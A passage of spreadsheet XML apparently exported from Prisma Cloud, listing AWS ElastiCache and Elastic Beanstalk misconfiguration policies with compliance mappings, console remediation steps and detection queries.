      <c r="C1889" s="2" t="inlineStr"/>
      <c r="D1889" t="inlineStr"/>
      <c r="E1889" t="inlineStr"/>
      <c r="F1889" t="inlineStr"/>
      <c r="G1889" t="b">
        <v>1</v>
      </c>
      <c r="H18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89" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1889" t="inlineStr">
        <is>
          <t>aws-elasticache</t>
        </is>
      </c>
      <c r="K1889" t="inlineStr">
        <is>
          <t>AWS ElastiCache Redis cluster with Redis AUTH feature disabled</t>
        </is>
      </c>
      <c r="L1889" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1889" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1889" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1889" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1889" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1889" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R1889" t="inlineStr">
        <is>
          <t>ISM-1603</t>
        </is>
      </c>
      <c r="S1889" t="inlineStr"/>
      <c r="T1889" t="b">
        <v>0</v>
      </c>
      <c r="U1889" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1889" t="inlineStr">
        <is>
          <t>aws-elasticache-describe-replication-groups</t>
        </is>
      </c>
      <c r="W1889" t="inlineStr">
        <is>
          <t>This policy identifies ElastiCache Redis clusters which have Redis AUTH feature disabled. Redis AUTH can improve data security by requiring the user to enter a password before they are granted permission to execute Redis commands on a password protected Redis server.</t>
        </is>
      </c>
      <c r="X1889" t="inlineStr">
        <is>
          <t>AWS ElastiCache Redis cluster Redis AUTH password can be set, only at the time of creation of the cluster. So to resolve this alert, create a new cluster with Redis AUTH feature enabled, then migrate all required ElastiCache Redis cluster data from the reported ElastiCache Redis cluster to this newly created cluster and delete the reported ElastiCache Redis cluster.
To create new ElastiCache Redis cluster with Redis AUTH password set, perform the following:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to ElastiCache Dashboard
4. Click on Redis
5. Click on 'Create' button
6. On the 'Create your Amazon ElastiCache cluster' page,
a. Select 'Redis' cache engine type.
b. Enter a name for the new cache cluster
c. Select Redis engine version from 'Engine version compatibility' dropdown list.
Note: As of July 2018, In-transit encryption can be enabled only for AWS ElastiCache clusters with Redis engine version 3.2.6 and 4.0.10.
d. Click on 'Advanced Redis settings' to expand the cluster advanced settings panel
e. Select 'Encryption in-transit' checkbox to enable encryption
Note: Redis AUTH can only be enabled when creating clusters where in-transit encryption is enabled.
f. Select 'Redis AUTH' checkbox to enable to enable AuthToken password
g. Type password you want enforce on 'Redis AUTH Token' textbox.
Choosen password should meet 'Passwords must be at least 16 and a maximum of 128 printable characters. At least 16 characters, and maximum 128 characters, restricted to any printable ASCII character except ' ', '"', '/' and '@' signs' criteria. Set the new Redis cluster other parameters which are same as of reported Redis cluster configuration details.
Note: The password set at cluster creation cannot be changed.
7. Click on 'Create' button to launch your new ElastiCache Redis cluster
To delete reported ElastiCache Redis cluster, perform the following:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to ElastiCache Dashboard
4. Click on Redis
5. Select reported Redis cluster
6. Click on 'Delete' button
7. In the 'Delete Cluster' dialog box, if you want back for you cluster select 'Yes' from the 'Create final backup' dropdown menu, provide a name for the cluster backup, then click on 'Delete'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-11
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-11</t>
        </is>
      </c>
      <c r="Y1889" t="inlineStr"/>
      <c r="Z1889" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elasticache-describe-replication-groups' AND json.rule = 'authTokenEnabled is false or transitEncryptionEnabled is false or authTokenEnabled does not exist or transitEncryptionEnabled does not exist'
{"category":"General","resourceTypes":["aws_elasticache_replication_group"]}</t>
        </is>
      </c>
      <c r="AA1889" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1889" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1889" t="inlineStr">
        <is>
          <t>PC-AWS-EC-216-CKV_AWS_31</t>
        </is>
      </c>
      <c r="AD1889" t="b">
        <v>1</v>
      </c>
      <c r="AE1889" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1889" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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89" t="inlineStr">
        <is>
          <t>2e9b2375-cd85-4569-b90b-65cdbb4fd0b6</t>
        </is>
      </c>
      <c r="AI1889" t="inlineStr">
        <is>
          <t>49dbb5bd-ea99-4d84-9f76-48aba9c92243</t>
        </is>
      </c>
      <c r="AJ1889" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1889" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1890">
      <c r="A1890" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, PCI DSS v4.0, GDPR, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, PCI DSS v4.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), PCI DSS v4.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, NIST 800-53 Rev4, Fedramp (Moderate), CRI Profile v1.2.1, Secure Controls Framework (SCF) - 2022.2.1, NIST CSF v2.0, PCI DSS v4.0, Copy of CIS Controls v8, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CyberSecurity Law of the People's Republic of China, MLPS 2.0 (Level 2), ISO/IEC 27017:2015, PCI DSS v4.0, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Telecommunications Security Act - TSA, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, ITSG-33, NIST CSF v2.0, Risk Management in Technology (RMiT), MLPS 2.0, PCI DSS v4.0, ISO/IEC 27018:2019, PCI DSS v4.0, CRI Profile v2.0, MAS TRM 2021, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, SOC 2, NIST SP 800-171 Revision 3, DORA, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NIST CSF, PCI DSS v4.0, NIST 800-53 Rev 5, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), TX-RAMP Level 2, CDC NIST 800-53 Rev4, PCI DSS v4.0, HIPAA, PCI DSS v4.0, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, MAS TRM 2021, PIPEDA, ISO/IEC 27002:2013, MLPS 2.0 (Level 3), CRI Profile v2.0, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CyberSecurity Law of the People's Republic of China, PCI DSS v4.0, CRI Profile v1.2.1, NIST SP 800-171 Revision 2, PCI DSS v3.2.1, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B1890" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1890" s="2" t="inlineStr"/>
      <c r="D1890" t="inlineStr"/>
      <c r="E1890" t="inlineStr"/>
      <c r="F1890" t="inlineStr"/>
      <c r="G1890" t="b">
        <v>1</v>
      </c>
      <c r="H18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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1890" t="inlineStr">
        <is>
          <t>aws-elasticache</t>
        </is>
      </c>
      <c r="K1890" t="inlineStr">
        <is>
          <t>AWS ElastiCache Redis cluster with encryption for data at rest disabled</t>
        </is>
      </c>
      <c r="L1890" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1890" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1890" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1890" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1890" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1890" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R1890" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S1890" t="inlineStr"/>
      <c r="T1890" t="b">
        <v>0</v>
      </c>
      <c r="U1890" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1890" t="inlineStr">
        <is>
          <t>aws-elasticache-describe-replication-groups</t>
        </is>
      </c>
      <c r="W1890" t="inlineStr">
        <is>
          <t>This policy identifies ElastiCache Redis clusters which have encryption for data at rest(at-rest) is disabled. It is highly recommended to implement at-rest encryption in order to prevent unauthorized users from reading sensitive data saved to persistent media available on your Redis clusters and their associated cache storage systems.</t>
        </is>
      </c>
      <c r="X1890" t="inlineStr">
        <is>
          <t>AWS ElastiCache Redis cluster at-rest encryption can be set only at the time of the creation of the cluster. So to fix this alert, create a new cluster with at-rest encryption, then migrate all required ElastiCache Redis cluster data from the reported ElastiCache Redis cluster to this newly created cluster and delete reported ElastiCache Redis cluster.
To create new ElastiCache Redis cluster with at-rest encryption set, perform the following:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to ElastiCache Dashboard
4. Click on Redis
5. Click on 'Create' button
6. On the 'Create your Amazon ElastiCache cluster' page,
a. Select 'Redis' cache engine type.
b. Enter a name for the new cache cluster
c. Select Redis engine version from 'Engine version compatibility' dropdown list.
Note: As of July 2018, In-transit encryption can be enabled only for AWS ElastiCache clusters with Redis engine version 3.2.6 and 4.0.10.
d. Click on 'Advanced Redis settings' to expand the cluster advanced settings panel
e. Select 'Encryption at-rest' checkbox to enable encryption along with other necessary parameters
7. Click on 'Create' button to launch your new ElastiCache Redis cluster
To delete reported ElastiCache Redis cluster, perform the following:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to ElastiCache Dashboard
4. Click on Redis
5. Select reported Redis cluster
6. Click on 'Delete' button
7. In the 'Delete Cluster' dialog box, if you want a backup for your cluster select 'Yes' from the 'Create final backup' dropdown menu, provide a name for the cluster backup, then click on 'Delete'. 
Build Recommendation: Refer the documentation for more details,
https://docs.bridgecrew.io/docs/general_9
IaC: Refer the documentation for more details,
https://docs.bridgecrew.io/docs/general_9</t>
        </is>
      </c>
      <c r="Y1890" t="inlineStr"/>
      <c r="Z1890" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elasticache-describe-replication-groups' AND json.rule = 'atRestEncryptionEnabled is false or atRestEncryptionEnabled does not exist'
{"category":"General","resourceTypes":["aws_elasticache_replication_group"]}</t>
        </is>
      </c>
      <c r="AA1890" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1890" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1890" t="inlineStr">
        <is>
          <t>PC-AWS-EC-212-CKV_AWS_29</t>
        </is>
      </c>
      <c r="AD1890" t="b">
        <v>1</v>
      </c>
      <c r="AE1890" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1890" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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0" t="inlineStr">
        <is>
          <t>884954a8-d886-4d58-a814-7fda27936166</t>
        </is>
      </c>
      <c r="AI1890" t="inlineStr">
        <is>
          <t>f22216ac-8065-43fc-81d4-18ea427af666</t>
        </is>
      </c>
      <c r="AJ1890" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1890" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1891">
      <c r="A1891" t="inlineStr">
        <is>
          <t>HIPAA, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, FFIEC, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MLPS 2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of CIS Controls v8, PCI DSS v4.0, FFIEC, SOC 2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0, MAS TRM 2021, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), DORA, PCI DSS v4.0, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, ACSC Information Security Manual (ISM), PCI DSS v4.0, HIPAA, Risk Management in Technology (RMiT), PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, MAS TRM 2021, PCI DSS v4.0, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B1891" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1891" s="2" t="inlineStr"/>
      <c r="D1891" t="inlineStr"/>
      <c r="E1891" t="inlineStr"/>
      <c r="F1891" t="inlineStr"/>
      <c r="G1891" t="b">
        <v>0</v>
      </c>
      <c r="H18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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1891" t="inlineStr">
        <is>
          <t>aws-elasticache</t>
        </is>
      </c>
      <c r="K1891" t="inlineStr">
        <is>
          <t>AWS ElastiCache Redis cluster encryption not configured with CMK key</t>
        </is>
      </c>
      <c r="L1891" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1891" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1891" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1891" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1891" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1891" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R1891" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S1891" t="inlineStr"/>
      <c r="T1891" t="b">
        <v>0</v>
      </c>
      <c r="U1891" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1891" t="inlineStr">
        <is>
          <t>aws-elasticache-describe-replication-groups</t>
        </is>
      </c>
      <c r="W1891" t="inlineStr">
        <is>
          <t>This policy identifies ElastiCache Redis clusters that are encrypted using the default KMS key instead of Customer Managed CMK (Customer Master Key) or CMK key used for encryption is disabled. As a security best practice enabled CMK should be used instead of the default KMS key for encryption to gain the ability to rotate the key according to your own policies, delete the key, and control access to the key via KMS policies and IAM policies.
For details:
https://docs.aws.amazon.com/AmazonElastiCache/latest/red-ug/at-rest-encryption.html#using-customer-managed-keys-for-elasticache-security</t>
        </is>
      </c>
      <c r="X1891" t="inlineStr">
        <is>
          <t>To encrypt your ElastiCache Redis cluster with CMK follow below mentioned URL:
https://docs.aws.amazon.com/AmazonElastiCache/latest/red-ug/at-rest-encryption.html#at-reset-encryption-enable-existing-cluster</t>
        </is>
      </c>
      <c r="Y1891" t="inlineStr"/>
      <c r="Z1891" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-elasticache-describe-replication-groups' AND json.rule = status equals available and atRestEncryptionEnabled is true as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' as Y; filter '($.X.kmsKeyId does not exist) or ($.X.kmsKeyId exists and $.Y.keyMetadata.keyState equals Disabled) and $.X.kmsKeyId equals $.Y.keyMetadata.arn'; show X;</t>
        </is>
      </c>
      <c r="AA1891" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1891" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1891" t="inlineStr">
        <is>
          <t>PC-AWS-EC-721</t>
        </is>
      </c>
      <c r="AD1891" t="b">
        <v>1</v>
      </c>
      <c r="AE1891" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1891" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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1" t="inlineStr">
        <is>
          <t>7581633b-0db1-4181-83c5-7fcc0347729d</t>
        </is>
      </c>
      <c r="AI1891" t="inlineStr">
        <is>
          <t>ce6d5fa5-1e04-4241-9fdb-199030c66f7c</t>
        </is>
      </c>
      <c r="AJ1891" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1891" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1892">
      <c r="A1892" t="inlineStr"/>
      <c r="B1892" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1892" s="2" t="inlineStr"/>
      <c r="D1892" t="inlineStr"/>
      <c r="E1892" t="inlineStr"/>
      <c r="F1892" t="inlineStr"/>
      <c r="G1892" t="b">
        <v>1</v>
      </c>
      <c r="H18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892" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1892" t="inlineStr">
        <is>
          <t>aws-elasticbeanstalk</t>
        </is>
      </c>
      <c r="K1892" t="inlineStr">
        <is>
          <t>AWS Elastic Beanstalk environment managed platform updates are not enabled</t>
        </is>
      </c>
      <c r="L1892" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1892" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1892" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1892" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1892" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1892" t="inlineStr"/>
      <c r="R1892" t="inlineStr"/>
      <c r="S1892" t="inlineStr"/>
      <c r="T1892" t="b">
        <v>0</v>
      </c>
      <c r="U1892" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1892" t="inlineStr">
        <is>
          <t>aws-elasticbeanstalk-environment</t>
        </is>
      </c>
      <c r="W1892" t="inlineStr">
        <is>
          <t>This policy identifies the AWS Elastic Beanstalk Environment where managed platform updates are not enabled.
Elastic Beanstalk is a platform as a service (PaaS) product from Amazon Web Services (AWS) that provides automated application deployment and scaling features. Enabling managed platform updates ensures that the latest available platform fixes, updates, and features for the environment are installed. Users must not apply updates manually without automatic updates, risking missed critical updates and potential security vulnerabilities. This can result in high-severity security risks, loss of data, and possible system downtime.
It is recommended to ensure platform updates are managed automatically is crucial for the overall security and performance of the applications running on the platform.</t>
        </is>
      </c>
      <c r="X1892" t="inlineStr">
        <is>
          <t>To configure managed platform updates for  Elastic Beanstalk environment, perform the following actions
1. Sign in to the AWS console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. Go to 'Elastic Beanstalk' service
4. In the navigation pane, choose 'Environments', then select the reported environment's name from the list
5. In the navigation pane, choose Configuration
6. In the 'Updates, monitoring, and logging' configuration category, choose Edit
7. Under 'Managed platform updates' section, Enable Managed updates by selecting the 'Activated' checkbox
8. If managed updates are enabled, select a maintenance window, and then select an 'Update level' according to your business requirements
9. To save the changes choose 'Apply' at the bottom of the page 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-340
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-340</t>
        </is>
      </c>
      <c r="Y1892" t="inlineStr"/>
      <c r="Z1892" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-elasticbeanstalk-environment' AND json.rule = status does not equal "Terminated" as X; config from cloud.resource where api.name = 'aws-elasticbeanstalk-configuration-settings' AND json.rule = configurationSettings[*].optionSettings[?any( optionName equals "ManagedActionsEnabled" and namespace equals "aws:elasticbeanstalk:managedactions" and value equals "false")] exists as Y; filter ' $.X.environmentName equals $.Y.configurationSettings[*].environmentName and $.X.applicationName equals $.Y.configurationSettings[*].applicationName'; show X;
{"category":"General","resourceTypes":["aws_elastic_beanstalk_environment"]}</t>
        </is>
      </c>
      <c r="AA1892" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1892" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1892" t="inlineStr">
        <is>
          <t>PC-AWS-EB-1230-CKV_AWS_340</t>
        </is>
      </c>
      <c r="AD1892" t="b">
        <v>1</v>
      </c>
      <c r="AE1892" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1892" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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892" t="inlineStr">
        <is>
          <t>538a77e5-5565-4813-8adc-c074feba466d</t>
        </is>
      </c>
      <c r="AI1892" t="inlineStr">
        <is>
          <t>0ff9780e-0b92-4b4e-849c-e3231468cd22</t>
        </is>
      </c>
      <c r="AJ1892" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1892" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1893">
      <c r="A1893" t="inlineStr">
        <is>
          <t>ITSG-33, Microsoft Cloud Security Benchmark v1, NYDFS 23 CRR-NY 500.0, GDPR, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, TX-RAMP Level 1, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, SOC 2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, DORA</t>
        </is>
      </c>
      <c r="B1893" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1893" s="2" t="inlineStr"/>
      <c r="D1893" t="inlineStr"/>
      <c r="E1893" t="inlineStr"/>
      <c r="F1893" t="inlineStr"/>
      <c r="G1893" t="b">
        <v>1</v>
      </c>
      <c r="H18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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1893" t="inlineStr">
        <is>
          <t>aws-elasticbeanstalk</t>
        </is>
      </c>
      <c r="K1893" t="inlineStr">
        <is>
          <t>AWS Elastic Beanstalk environment logging not configured</t>
        </is>
      </c>
      <c r="L1893" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1893" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1893" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1893" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1893" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1893" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R1893" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S1893" t="inlineStr"/>
      <c r="T1893" t="b">
        <v>0</v>
      </c>
      <c r="U1893" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1893" t="inlineStr">
        <is>
          <t>aws-elasticbeanstalk-environment</t>
        </is>
      </c>
      <c r="W1893" t="inlineStr">
        <is>
          <t>This policy identifies the Elastic Beanstalk environments not configured to send logs to CloudWatch Logs.
An Elastic Beanstalk environment is a configuration of AWS resources where you can deploy your application. The environment logs refer to the logs generated by various components of your application, which can provide valuable insights into any errors or issues that may arise during operation. Failing to enable logging in an Elastic Beanstalk environment reduces visibility, hinders incident detection and response, and increases vulnerability to security breaches.
It is recommended to configure AWS Elastic Beanstalk environments to send logs to CloudWatch to ensure security and meet compliance requirements.</t>
        </is>
      </c>
      <c r="X1893" t="inlineStr">
        <is>
          <t>To stream Elastic Beanstalk environment logs to CloudWatch Logs,
1. Sign in to the AWS console.
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Go to 'Elastic Beanstalk' service.
4. In the navigation pane, choose 'Environments', then select the reported environment's name from the list.
5. In the navigation pane, choose Configuration.
6. In the 'Updates, monitoring, and logging' configuration category, choose Edit.
7. Under 'Instance log streaming to CloudWatch Logs', Enable Log streaming by selecting the 'Activated' checkbox.
8. Set 'Retention' to the number of days to save the logs.
9. Select the 'Lifecycle' setting that determines whether the logs are saved after the environment is terminated according to your business requirements.
10. To save the changes choose 'Apply' at the bottom of the page.</t>
        </is>
      </c>
      <c r="Y1893" t="inlineStr"/>
      <c r="Z1893" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-elasticbeanstalk-environment' AND json.rule = status does not equal "Terminated" as X; config from cloud.resource where api.name = 'aws-elasticbeanstalk-configuration-settings' AND json.rule = configurationSettings[*].optionSettings[?any( optionName equals "StreamLogs" and value equals "false" )] exists as Y; filter ' $.X.environmentName equals $.Y.configurationSettings[*].environmentName and $.X.applicationName equals $.Y.configurationSettings[*].applicationName'; show X;</t>
        </is>
      </c>
      <c r="AA1893" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1893" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1893" t="inlineStr">
        <is>
          <t>PC-AWS-EB-1145</t>
        </is>
      </c>
      <c r="AD1893" t="b">
        <v>1</v>
      </c>
      <c r="AE1893" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1893" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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3" t="inlineStr">
        <is>
          <t>f8f20be3-a2a3-4961-9a3c-5b70ff7d9269</t>
        </is>
      </c>
      <c r="AI1893" t="inlineStr">
        <is>
          <t>bd9b8fc0-051b-417a-8f7b-805c26a25f39</t>
        </is>
      </c>
      <c r="AJ1893" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1893" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1894">
      <c r="A1894" t="inlineStr">
        <is>
